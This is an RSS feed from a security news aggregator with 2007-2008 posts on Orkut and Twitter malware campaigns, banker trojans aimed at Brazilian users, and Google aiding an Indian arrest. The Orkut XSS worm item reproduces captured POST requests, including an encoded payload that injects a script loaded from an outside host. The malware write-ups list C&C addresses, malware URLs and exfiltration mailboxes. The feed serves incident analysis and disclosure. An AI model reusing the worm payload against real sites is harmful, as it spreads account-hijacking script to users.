<?xml version="1.0" encoding="utf-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title><![CDATA[[SecurityRatty] tag: orkut]]></title>
    <link>http://securityratty.com/tag/orkut</link>
    <description></description>
    <pubDate>Thu, 20 Dec 2007 13:18:37 +0000</pubDate>
    <generator>iRatty Engine</generator>
    <docs>http://blogs.law.harvard.edu/tech/rss</docs>
    <item>
      <title><![CDATA[The Twitter Malware Campaign Wants to Bank With You]]></title>
      <link>http://securityratty.com/article/0a86c9e6b40c8995b8c3f84a2d12480a</link>
      <guid>http://securityratty.com/article/0a86c9e6b40c8995b8c3f84a2d12480a</guid>
      <description><![CDATA[In what appears to be a lone gunman malware campaign -- where the malware spreader even left his email address within the binary - the now down Twitter malware campaign managed to attract only 69...]]></description>
      <content:encoded><![CDATA[<div style="text-align: left;"></div><div class="separator" style="text-align: center; clear: both;"></div><a href="http://bp0.blogger.com/_wICHhTiQmrA/SJgk-RghwII/AAAAAAAAB_c/xbrYBDO4K9Q/s1600-h/twitter_malware1.JPG" imageanchor="1" style="border: 0pt none ; background-color: transparent; clear: left; margin-bottom: 1em; float: left; margin-right: 1em;"><img src="http://bp0.blogger.com/_wICHhTiQmrA/SJgk-RghwII/AAAAAAAAB_c/om2-uxKUmR4/s200-R/twitter_malware1.JPG" style="border: 0pt none ;" /></a>In <a href="http://www.twitpwn.com/2008/08/coming-up-malware-on-twitter.html">what appears to</a> be a lone gunman <a href="http://www.viruslist.com/en/weblog?weblogid=208187551">malware campaign</a> -- where the malware spreader even left his email address within the binary - the now down <a href="http://blogs.guardian.co.uk/technology/2008/08/05/twiters_trojan_problem.html">Twitter malware campaign</a> managed to attract only 69 followers before it has shut down, <a href="http://www.techcrunch.com/2008/07/27/who-is-johng77536-and-how-did-he-game-twitter/">using a trivial approach</a> for launching an XSS worm - <a href="http://en.wikipedia.org/wiki/Cross-site_request_forgery">Cross-site request forgery</a> (CSRF). More info :<br />
<br />
"<i>This week it’s Twitter’s turn to host an attack - one that is targeting both Twitter users and the Internet community at large. In this case it's a malicious Twitter profile twitter.com/[skip]/ with a name that is Portuguese for ‘pretty rabbit’ which has a photo advertising a video with girls posted.&nbsp;</i><br />
<br />
<i>This profile has obviously been created especially for infecting users, as there is no other data except the photo, which contains the link to the video. If you click on the link, you get a window that shows the progress of an automatic download of a so-called new version of Adobe Flash which is supposedly required to watch the video. You end up with a file labeled Adobe Flash (it’s a fake) on your machine; a technique that is currently very popular.</i>"<br />
<br />
<div style="text-align: left;"></div><div class="separator" style="text-align: center; clear: both;"></div><a href="http://bp0.blogger.com/_wICHhTiQmrA/SJg7qxrXS-I/AAAAAAAAB_k/X5JjQEBfcgc/s1600-h/twitter_malware.JPG" imageanchor="1" style="border: 0pt none ; background-color: transparent; clear: left; margin-bottom: 1em; float: left; margin-right: 1em;"><img src="http://bp0.blogger.com/_wICHhTiQmrA/SJg7qxrXS-I/AAAAAAAAB_k/tnrV5eIbz1M/s200-R/twitter_malware.JPG" style="border: 0pt none ;" /></a>Let's analyze the campaign before it was shut down. The original Twitter account used <b>twitter.com/video_kelly_key</b> basically included a link to <b>player-video-youtube.sytes.net</b> (204.16.252.98) which was using a URL shortening service <b>fly2.ws/NilOMN3</b> in order to redirect to the banker malware located at <b>freewebtown.com/construimagens/ Play-video-youtube.kelly-key.com</b>. It's detection rate is as follows :<br />
<br />
<b>Scanners Result</b>: 14/36 (38.89%)<br />
Trojan-Spy.Win32.Banker.caw <br />
<b>File size</b>: 88064 bytes<br />
<b>MD5</b>...: 25600af502758ca992b9e7fff3739def<br />
<b>SHA1</b>..: 9262ca501ef388e0fe42c50a3d002ddbd6e254f2<br />
<br />
<div style="text-align: left;"></div><div class="separator" style="text-align: center; clear: both;"></div><a href="http://bp3.blogger.com/_wICHhTiQmrA/SJg8dgf3PnI/AAAAAAAAB_s/zemAG6fn3rM/s1600-h/xss_csrfworm.png" imageanchor="1" style="border: 0pt none ; background-color: transparent; clear: left; margin-bottom: 1em; float: left; margin-right: 1em;"><img src="http://bp3.blogger.com/_wICHhTiQmrA/SJg8dgf3PnI/AAAAAAAAB_s/lOjia4dpUaw/s200-R/xss_csrfworm.png" style="border: 0pt none ;" /></a>Twitter isn't an exception to the realistic potential for <a href="http://0x000000.com/index.php?i=512&amp;bin=1000000000">XSS worms though CSRF that could affect each and every Web 2.0 service</a>, which as a matter of fact have all suffered such attempts, namely, <a href="http://ha.ckers.org/blog/20071220/orkut-xss-worm" title="Orkut XSS Worm">Orkut</a>, <a href="http://en.wikipedia.org/wiki/Samy_%28XSS%29" title="Samy MySpace XSS Worm">MySpace</a> (as well as the <a href="http://securitylabs.websense.com/content/Alerts/1319.aspx" title="MySpace QuickTime XSS Flaw">QuickTime XSS flaw</a>), <a href="http://blogs.securiteam.com/index.php/archives/786" title="GaiaOnline XSS Worm">GaiaOnline</a>, <a href="http://sirdarckcat.blogspot.com/2007/12/making-social-network-xss-worm-hi5com.html" title="Hi5 XSS Worm">Hi5</a>, and most recently the <a href="http://blogs.zdnet.com/security/?p=1487">XSS worm at Justin.tv</a>, demonstrate that trivial vulnerabilities come handy for what's to turn into a major security incident if not taken care of promptly.<br />
<br />
<b>Related posts:</b><br />
<a href="http://ddanchev.blogspot.com/2007/05/xss-planet.html">XSS The Planet</a><br />
<a href="http://ddanchev.blogspot.com/2007/02/xss-vulnerabilities-in-e-banking-sites.html">XSS Vulnerabilities in E-banking Sites</a><br />
<a href="http://ddanchev.blogspot.com/2006/05/current-state-of-web-application-worms.html">The Current State of Web Application Worms</a><br />
<a href="http://ddanchev.blogspot.com/2007/06/g0t-xssed.html">g0t XSSed?</a><br />
<a href="http://ddanchev.blogspot.com/2006/06/web-application-email-harvesting-worm.html">Web Application Email Harvesting Worm </a><div class="feedflare">
<a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=oWAtgK"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=oWAtgK" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=L5UJoK"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=L5UJoK" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=dlgqak"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=dlgqak" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=3uAsZk"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=3uAsZk" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=YHdd5K"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=YHdd5K" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=AezGSK"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=AezGSK" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=JZQeBk"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=JZQeBk" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/DanchoDanchevOnSecurityAndNewMedia/~4/356281978" height="1" width="1"/>]]></content:encoded>
      <pubDate>Tue, 05 Aug 2008 03:14:42 +0000</pubDate>
      <category domain="http://securityratty.com/tag/twitter">twitter</category>
      <category domain="http://securityratty.com/tag/twitter malware campaign">twitter malware campaign</category>
      <category domain="http://securityratty.com/tag/xss">xss</category>
      <category domain="http://securityratty.com/tag/xss vulnerabilities">xss vulnerabilities</category>
      <category domain="http://securityratty.com/tag/original twitter account">original twitter account</category>
      <category domain="http://securityratty.com/tag/xss worms">xss worms</category>
      <category domain="http://securityratty.com/tag/xss worm">xss worm</category>
      <category domain="http://securityratty.com/tag/twitter users">twitter users</category>
      <category domain="http://securityratty.com/tag/worm">worm</category>
      <source url="http://feeds.feedburner.com/~r/DanchoDanchevOnSecurityAndNewMedia/~3/356281978/twitter-malware-campaign-wants-to-bank.html">The Twitter Malware Campaign Wants to Bank With You</source>
    </item>
    <item>
      <title><![CDATA[Google Helps Arrest Man In India]]></title>
      <link>http://securityratty.com/article/0b8e164cfc79566e15923ef53812621b</link>
      <guid>http://securityratty.com/article/0b8e164cfc79566e15923ef53812621b</guid>
      <description><![CDATA[Google pulls a Yahoo in India
From TechCrunch
Today were hearing of another arrest, this time in India. 22-year-old IT professional Rahul Krishnakumar Vaid. His crime was writing in an orkut community...]]></description>
      <content:encoded><![CDATA[<p>Google pulls a <a href="http://www.liquidmatrix.org/blog/2007/10/17/yahoo-accused-of-misleading-congress-about-chinese-journalist/">Yahoo</a> in India. </p>
<p>From TechCrunch:</p>
<blockquote><p>Today we’re hearing of another arrest, this time in India. 22-year-old IT professional Rahul Krishnakumar Vaid. His crime was writing in an orkut community named “I hate Sonia Gandhi.” Sonia Gandhi is a prominent politician in India.</p>
<p>Vaid was charged under section 292 of Indian Penal Code and section 67 of the Information Technology Act because he created a profile and then posted content in vulgar language about Sonia Gandhi in the community.</p>
<p>During investigations, the cyber crime cell of Pune police communicated with Google (which owns Orkut) seeking details about the man who formed this forum and circulated the obscene content. It was known that the vulgar message about Sonia Gandhi was circulated through an email address – Rahulvaidindia@gmail.com . The owner of the email id Rahul Vaid was traced, using information supplied by Google, to Chakarpur in Gurgaon city of Haryana.</p></blockquote>
<p>Allegedly he was vulgar with respects to his postings. This is apparently against the law in India. The offense could fetch him roughly 5 years in the clink if convicted. </p>
<p>Don&#8217;t be evil, eh?</p>
<p><a href="http://www.techcrunch.com/2008/05/18/hit-pause-on-the-evil-button-google-assists-in-arrest-of-indian-man/">Article Link</a></p>

<p><a href="http://feeds.feedburner.com/~a/Liquidmatrix?a=bp9ZaI"><img src="http://feeds.feedburner.com/~a/Liquidmatrix?i=bp9ZaI" border="0"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~f/Liquidmatrix?a=wCz11H"><img src="http://feeds.feedburner.com/~f/Liquidmatrix?i=wCz11H" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/Liquidmatrix?a=oOhIYh"><img src="http://feeds.feedburner.com/~f/Liquidmatrix?i=oOhIYh" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/Liquidmatrix?a=xKx9ih"><img src="http://feeds.feedburner.com/~f/Liquidmatrix?i=xKx9ih" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/Liquidmatrix?a=CUXBXh"><img src="http://feeds.feedburner.com/~f/Liquidmatrix?i=CUXBXh" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/Liquidmatrix?a=CRNwsh"><img src="http://feeds.feedburner.com/~f/Liquidmatrix?i=CRNwsh" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/Liquidmatrix/~4/293885243" height="1" width="1"/>]]></content:encoded>
      <pubDate>Mon, 19 May 2008 21:00:49 +0000</pubDate>
      <category domain="http://securityratty.com/tag/google">google</category>
      <category domain="http://securityratty.com/tag/india">india</category>
      <category domain="http://securityratty.com/tag/sonia gandhi">sonia gandhi</category>
      <category domain="http://securityratty.com/tag/vulgar">vulgar</category>
      <category domain="http://securityratty.com/tag/vulgar message">vulgar message</category>
      <category domain="http://securityratty.com/tag/community">community</category>
      <category domain="http://securityratty.com/tag/orkut community named">orkut community named</category>
      <category domain="http://securityratty.com/tag/information technology act">information technology act</category>
      <category domain="http://securityratty.com/tag/google pulls">google pulls</category>
      <source url="http://feeds.feedburner.com/~r/Liquidmatrix/~3/293885243/">Google Helps Arrest Man In India</source>
    </item>
    <item>
      <title><![CDATA[Google defends helping police nab defamer]]></title>
      <link>http://securityratty.com/article/0112cab3bcb87b3976b96cdd3f72cb15</link>
      <guid>http://securityratty.com/article/0112cab3bcb87b3976b96cdd3f72cb15</guid>
      <description><![CDATA[Google said Monday that it complied with Indian legal process when it gave police information about a user of its Orkut social networking site. With the IP address of a person who had allegedly posted...]]></description>
      <content:encoded><![CDATA[Google said Monday that it complied with Indian legal process when it gave police information about a user of its Orkut social networking site. With the IP address of a person who had allegedly posted vulgar content about Sonia Gandhi, one of India's top political leaders, on Orkut, police in Pune were able to arrest a suspect.]]></content:encoded>
      <pubDate>Sun, 18 May 2008 20:00:00 +0000</pubDate>
      <category domain="http://securityratty.com/tag/police">police</category>
      <category domain="http://securityratty.com/tag/indian legal process">indian legal process</category>
      <category domain="http://securityratty.com/tag/orkut">orkut</category>
      <category domain="http://securityratty.com/tag/orkut social">orkut social</category>
      <category domain="http://securityratty.com/tag/top political leaders">top political leaders</category>
      <category domain="http://securityratty.com/tag/police information">police information</category>
      <category domain="http://securityratty.com/tag/google">google</category>
      <category domain="http://securityratty.com/tag/sonia gandhi">sonia gandhi</category>
      <category domain="http://securityratty.com/tag/vulgar content">vulgar content</category>
      <source url="http://www.networkworld.com/news/2008/051908-google-defends-helping-police-nab.html?fsrc=rss-security">Google defends helping police nab defamer</source>
    </item>
    <item>
      <title><![CDATA[A Localized Bankers Malware Campaign]]></title>
      <link>http://securityratty.com/article/ea11429ef3965d10e04a17305f7c51c6</link>
      <guid>http://securityratty.com/article/ea11429ef3965d10e04a17305f7c51c6</guid>
      <description><![CDATA[Just like the Targeted Spamming of Bankers Malware campaign that I exposed in November 2007, in this post I'll assess another targeted, but also localized to Portuguese campaign with a decent degree...]]></description>
      <content:encoded><![CDATA[<a href="http://bp0.blogger.com/_wICHhTiQmrA/R-kZwV2802I/AAAAAAAABfA/VXdQAuBAgmA/s1600-h/localized_bankers_malware.bmp"><img id="BLOGGER_PHOTO_ID_5181701164558504802" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://bp0.blogger.com/_wICHhTiQmrA/R-kZwV2802I/AAAAAAAABfA/VXdQAuBAgmA/s200/localized_bankers_malware.bmp" border="0" /></a>Just like the <a href="http://ddanchev.blogspot.com/2007/11/targeted-spamming-of-bankers-malware.html">Targeted Spamming of Bankers Malware</a> campaign that I exposed in November 2007, in this post I'll assess another targeted, but also localized to Portuguese campaign with a decent degree of cyber deception applied. It appears that the latest round has been spammed two days ago, but expanding their ecosystem reveals evidence of more bankers malware on behalf of the same malicious parties. What's particularly interesting about this campaign, is that they're using a hardcoded list of already breached email accounts of mostly Brazilian users, and using it as a foundation for the distribution of the malware under the clean IP reputation - which explains why the email makes it through anti-spam filters. The message impersonating Hotmail could have been easily outsourced as a translation process, as I've already pointed out in a previous post emphasizing on <a href="http://ddanchev.blogspot.com/2008/02/localizing-cybercrime-cultural.html">acquiring cultural diversity on demand for malicious malware, spam and phishing purposes</a>. However, in this case it's more important to emphasize on <a href="http://ddanchev.blogspot.com/2007/11/lonely-polinas-secret.html">the targeted nature of the campaign</a>, and the use of a Russian free web space provider as a hosting provider for the malware.<br /><br /><a href="http://bp1.blogger.com/_wICHhTiQmrA/R-keil2803I/AAAAAAAABfI/0zDNvrz1HI8/s1600-h/bankers_bankline_localized.jpg"><img id="BLOGGER_PHOTO_ID_5181706425893442418" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://bp1.blogger.com/_wICHhTiQmrA/R-keil2803I/AAAAAAAABfI/0zDNvrz1HI8/s200/bankers_bankline_localized.jpg" border="0" /></a>Now on the cyber deception issue. Basically, you have a malware campaign targeting Portuguese speaking end users, that's been emailed using Brazilian mail servers through a set of hardcoded and already breached local email acounts, it's serving fake bank logins of a Portuguese bank, whereas the malicious parties are using a Russian free web space provider, <strong>front.ru</strong> in this case as a reliable and outsourced approach to host the malware malware. Is this an example of the <a href="http://ddanchev.blogspot.com/2007/12/phishers-spammers-and-malware-authors.html">maturing consolidation betweeen spammers, phishers and malware authors</a>, or is someone trying to <a href="http://ddanchev.blogspot.com/2007/12/russias-fsb-vs-cybercrime.html">engineer cyber crime tensions</a>? I'd go for the second, the command and control of this banker malware is hiding behind a fake image file, and is all in Portuguese, the way the emails where the stolen information or notifications per infection are descripted in Portuguese. Moreover, within several of the subdomains hosted at <strong>front.ru</strong>, there're also pages pushing bankers malware through a fake Apaixonado Big Brother Brazil 2008 pages. So you have a South American malicious party generating noise on behalf of Russia's overall bad reputation in respect to malware. Here are more details from this campaign :<br /><br /><a href="http://bp1.blogger.com/_wICHhTiQmrA/R-kqEl2804I/AAAAAAAABfQ/H5ySvnLTMug/s1600-h/front_ru_bankers_malware.bmp"><img id="BLOGGER_PHOTO_ID_5181719104636900226" style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://bp1.blogger.com/_wICHhTiQmrA/R-kqEl2804I/AAAAAAAABfQ/H5ySvnLTMug/s200/front_ru_bankers_malware.bmp" border="0" /></a><strong>Subject</strong>: Cancelamento de E-Mail<br /><strong>Message</strong>: "<em>Ola usuario, informamos que no dia 24 de Marco de 2008, a Equipe Hotmail alterou o conteudo dos "Termos e Condicoes de uso" e por isso tem a obrigacao de comunicar este fato a todos os usuarios que utilizam frequentemente seu Windows Live ID. Seu Windows Live ID esta associado a sua conta Hotmail.com, caso nao aceite os novos "Termos e Condicoes de uso" podera perder sua conta. (Porque posso perder minha conta?) Li e aceito os termos e condicoes de uso Nao aceito os termos e condicoes de uso Atenciosamente, Equipe Hotmail</em>"<br /><strong>Sent from</strong>: knight.bs2.com.br<br /><strong>Banker location</strong>: suport022.front.ru/flashcard/ list.exe<br /><br /><strong>Scanners Result</strong>: 13/32 (40.62%)<br />TR/Spy.Banker.Gen; Trojan-Spy.Win32.Banker.JU<br /><strong>File size</strong>: 3339776 bytes<br /><strong>MD5:</strong> e00b1cd654b5b3fd5c8a1f5e71939a04<br /><strong>SHA1</strong>: cc11a030e868ece65769e177616cbebfb239bee6<br /><br />It's also interesting to note that this campaign's been aiming to stay beneath the radar, not just by localizing the campaign itself and distributing the malware in a targeted nature, but by using a minimalistic spamming practices as you can see in the screenshot indicating a modest binary change in between three days or so. However, based on the identical mutex created by several different malware samples, and the free web space hosting provider used, I was able to locate more banker malwares created by the same malicious parties, again using <strong>front.ru</strong> as a hosting provider for more bankers malware under the following locations :<br /><br /><strong>www-orkut-compronfiles-aspxuids-.front.ru/ lkjhgterri.com</strong><br /><strong>www-orkut-compronfiles-aspxuids-.front.ru/ plugins.com</strong><br /><strong>www-orkut-compronfiles-aspxuids-.front.ru/ remote.com</strong><br /><strong>www-orkut-compronfiles-aspxuids-.front.ru/ pro.com</strong><br /><strong>www-orkut-compronfiles-aspxuids.front.ru</strong><br /><strong>www-orkut-comprofile-aspxuid.front.ru</strong><br /><strong>albumfotos.front.ru/ winupdate.exe</strong><br /><strong>gsnet.front.ru/ gm.exe</strong><br /><strong>informes2000.front.ru/ robin.exe</strong><br /><br />The cute part is that the malicious parties behind it allow anyone to take a peek at the list of breached email accounts and the associated passwords due to the usual misconfiguration on their server, allowing me to come up with the C&amp;Cs update locations, predefined message to be included within upcoming campaigns, and the email addresses used for internal purposes, like the following -<br /><br />IPs used in the C&amp;Cs hiding behind .jpg files :<br /><br /><strong>75.125.251.36</strong><br /><strong>75.125.251.38</strong><br /><strong>75.125.251.40</strong><br /><br />The fake bank logins locations found within the configuration :<br /><br /><strong>75.125.251.40/home/it/it.html</strong><br /><strong>75.125.251.40/home/it/it2.html</strong><br /><strong>75.125.251.40/home/it/iutb.html</strong><br /><strong>75.125.251.40/home/br/bj1.html</strong><br /><br />Internal hardcoded email addresses :<br /><br /><strong>receiver.guzano@ gmail.com</strong><br /><strong>receiver.smtp@ gmail.com</strong><br /><strong>ladrao.contatos@ gmail.com</strong><br /><strong>urls.file@ gmail.com</strong><br /><strong>receiver.guzano@ gmail.com</strong><br /><br />The bottom line, the campaign is well organized, primarily targeting Portuguese speaking end users, is being spammed from stolen email accounts, and has its malware hosted on a Russian free web space provider. Perhaps the only thing it's missing is a better segmented emails database that would have improved the success rate especially from a targeted perspective. As in the majority of malware campaigns, it's their common pattern that leads to the exposure of the entire ecosystem of who's who and what's what.<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=FKxvCeF"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=FKxvCeF" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=8NdV78F"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=8NdV78F" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=dV4oIVf"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=dV4oIVf" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=RwUG5Zf"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=RwUG5Zf" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=RhRac4F"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=RhRac4F" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=EMgN5JF"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=EMgN5JF" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=eZ93Skf"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=eZ93Skf" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/DanchoDanchevOnSecurityAndNewMedia/~4/257869573" height="1" width="1"/>]]></content:encoded>
      <pubDate>Tue, 25 Mar 2008 11:59:06 +0000</pubDate>
      <category domain="http://securityratty.com/tag/malware">malware</category>
      <category domain="http://securityratty.com/tag/bankers malware campaign">bankers malware campaign</category>
      <category domain="http://securityratty.com/tag/malware malware">malware malware</category>
      <category domain="http://securityratty.com/tag/malware campaigns">malware campaigns</category>
      <category domain="http://securityratty.com/tag/malicious malware">malicious malware</category>
      <category domain="http://securityratty.com/tag/banker malware">banker malware</category>
      <category domain="http://securityratty.com/tag/bankers malware">bankers malware</category>
      <category domain="http://securityratty.com/tag/malware authors">malware authors</category>
      <category domain="http://securityratty.com/tag/campaign">campaign</category>
      <source url="http://feeds.feedburner.com/~r/DanchoDanchevOnSecurityAndNewMedia/~3/257869573/localized-bankers-malware-campaign.html">A Localized Bankers Malware Campaign</source>
    </item>
    <item>
      <title><![CDATA[Orkut XSS Worm]]></title>
      <link>http://securityratty.com/article/754be452d38ea7e3dce5991e705fe089</link>
      <guid>http://securityratty.com/article/754be452d38ea7e3dce5991e705fe089</guid>
      <description><![CDATA[Several people sent this to me over the last few days but for those of you who hadnt seen it in the myriad of different places it showed up, Orkut was hacked using a XSS worm . Orkut is Googles...]]></description>
      <content:encoded><![CDATA[<p>Several people sent this to me over the last few days but for those of you who hadn&#8217;t seen it in the <A HREF="http://www.theregister.co.uk/2007/12/19/worm_hits_orkut/">myriad</A> of <A HREF="http://www.gnucitizen.org/blog/the-orkut-xss-worm">different</A> places it showed up, <A HREF="http://www.darkreading.com/document.asp?doc_id=141761&#038;WT.svl=news1_2">Orkut was hacked using a XSS worm</a>.  Orkut is Google&#8217;s version of social networking.  It was big for a while, but I think everyone bailed in favor of the more open MySpace and Facebook&#8217;s of the world.  It&#8217;s still widely used by the Portuguese population though.</p>
<p>Rough estimates are north of 300,000 people compromised, even though it was caught relatively quickly.  It&#8217;s amazing how fast these things grow in environments like that, where the medium for spreading is based on a technology that almost everyone uses and works across platform.  I think the only thing stopping this from being more virulent is making it cross platform, and making the social engineering a little more seamless.</p>
<p>Here are the POST requests sent in by Lavakumar:</p>
<p>
<blockquote>POST request sent by the worm to add the victim to the &#8220;Infectados pelo Vírus do Orkut&#8221; community. The community id is &#8220;44001818&#8243;.</p>
<p>POST /CommunityJoin.aspx?cmm=44001818 HTTP/1.1<br />
Host: www.orkut.com<br />
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11<br />
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5<br />
Accept-Language: en-us,en;q=0.5<br />
Accept-Encoding: gzip,deflate<br />
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br />
Keep-Alive: 300<br />
Proxy-Connection: keep-alive<br />
Content-Type: application/x-www-form-urlencoded<br />
Referer: http://www.orkut.com/Scrapbook.aspx?uid=<-xxxxxxxxxxxxxxxxxxxx-><br />
Cookie: -xxxxxxxxx-<br />
Pragma: no-cache<br />
Cache-Control: no-cache<br />
Content-Length: 98</p>
<p>POST_TOKEN=0B57493EBE09C74A3D69298F67635479&#038;signature=Bm1YihIUAe5I%2BAvfFH7v4bjtdrI%3D&#038;Action.join</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>POST request sent by the worm to submit itself to the scrapbook of the victim&#8217;s friends.</p>
<p>POST /Scrapbook.aspx HTTP/1.1<br />
Host: www.orkut.com<br />
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11<br />
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5<br />
Accept-Language: en-us,en;q=0.5<br />
Accept-Encoding: gzip,deflate<br />
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br />
Keep-Alive: 300<br />
Proxy-Connection: keep-alive<br />
Content-Type: application/x-www-form-urlencoded<br />
Referer: http://www.orkut.com/Scrapbook.aspx?uid=-xxxxxxxxx-<br />
Cookie: -xxxxxxxxx-<br />
Pragma: no-cache<br />
Cache-Control: no-cache<br />
Content-Length: 146</p>
<p>Action.submit=1&#038;POST_TOKEN=0B57493EBE09C74A3D69298F67635479&#038;scrapText=2008%20vem%20ai&#8230;%20que%20ele%20comece%20mto%20bem%20para%20vc%3Cbr%2F%3E%5Bsilver%5DRL%20Wed%20Dec%2019%202007%2009%3A52%3A21%20GMT%2B0530%20(India%20Standard%20Time)%5B%2Fsilver%5D%3Cbr%2F%3E%3Cembed%20src%3D%22http%3A%2F%2Fwww.orkut.com%2FLoL.aspx%22%20type%3D%22application%2Fx-shockwave-flash%22%20wmode%3D%22transparent&#8217;)%3B%20script%3Ddocument.createElement(&#8217;script&#8217;)%3Bscript.src%3D&#8217;http%3A%2F%2Ffiles.myopera.com%2Fvirusdoorkut%2Ffiles%2Fvirus.js&#8217;%3Bdocument.getElementsByTagName(&#8217;head&#8217;)%5B0%5D.appendChild(script)%3Bescape(&#8217;%22%20%20width%3D%221%22%20height%3D%221%22%3E%3C%2Fembed%3E&#038;signature=Bm1YihIUAe5I%2BAvfFH7v4bjtdrI%3D&#038;toUserId=14668216</p></blockquote>
<p>And the code can be found in many places around the net, but I also threw up a copy on the <A HREF="http://sla.ckers.org/forum/read.php?2,14477">sla.ckers.org XSS worm</A> section for anyone looking for example worm code.  I&#8217;m trying to keep that section up to date with non-theoretical, but practical and real world worm code so we can all see it.  Google has fixed this issue, but it is unclear what the fallout of the damage will be.</p>
<!--Thu, 27 December 2007 09:12:07 +000-->]]></content:encoded>
      <pubDate>Thu, 20 Dec 2007 13:18:37 +0000</pubDate>
      <category domain="http://securityratty.com/tag/orkut">orkut</category>
      <category domain="http://securityratty.com/tag/worm">worm</category>
      <category domain="http://securityratty.com/tag/post">post</category>
      <category domain="http://securityratty.com/tag/community">community</category>
      <category domain="http://securityratty.com/tag/orkut community">orkut community</category>
      <category domain="http://securityratty.com/tag/post scrapbook">post scrapbook</category>
      <category domain="http://securityratty.com/tag/xss worm">xss worm</category>
      <category domain="http://securityratty.com/tag/post requests">post requests</category>
      <category domain="http://securityratty.com/tag/worm code">worm code</category>
      <source url="http://ha.ckers.org/blog/20071220/orkut-xss-worm/">Orkut XSS Worm</source>
    </item>
  </channel>
</rss>
